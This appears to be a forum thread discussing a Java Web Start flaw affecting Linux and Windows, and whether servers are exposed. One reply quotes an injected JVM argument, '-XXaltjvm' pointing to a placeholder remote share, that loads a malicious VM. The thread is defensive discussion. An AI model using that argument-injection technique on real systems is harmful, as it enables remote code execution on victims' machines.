Client Side Java Flaw Affects Both Linux and Windows - Careful On Your Servers

Discussions

News: Client Side Java Flaw Affects Both Linux and Windows - Careful On Your Servers

  1. It appears that the flaw in the Java Web Start framework affects Linux machines just as much as Windows machines.


    The issue affects all versions since Java SE 6 update 10. Disabling the java plugin is not sufficient to prevent exploitation, as the toolkit is installed independently.

    --------------
    Core Security Patterns: Best Practices and Strategies for J2EE ~ Ramesh Nagappan
    Java Security ~ Scott Oaks
  2. It appears that the flaw in the Java Web Start framework affects Linux machines just as much as Windows machines.


    The issue affects all versions since Java SE 6 update 10. Disabling the java plugin is not sufficient to prevent exploitation, as the toolkit is installed independently.
    But you would have to have somehow get a 'bad VM' on the target system in order to make this work.  Since people (smart people anyway) don't surf the web from their server boxes, the hacker would have to have some way to get the poisoned VM on the server.  And I guess I'm not clear how Java Web Start would be started on a server.
  3. **Since people (smart people anyway) don't surf the web from their server boxes...

    Agreed. But sometimes smart people are lazy, especially around pre-prod and sandbox servers. Plus, who are we kidding - not every admin is smart. Point taken though.
  4. But you would have to have somehow get a 'bad VM'...
    I've read somewhere else, ZDnet I think, that people are using UNC paths to download a bad vm on the fly, like this:

    -XXaltjvm=\\badserver\share\...

    This only works on windows though, but there are windows servers out there too :-)
  5. Thanks for answering that.  The other question I have is how is WebStart being invoked on servers?  We have such strict control over what can be deployed on our servers.  I can't imagine someone using Java WebStart to download Java to run on a server.  I might just be missing something about this.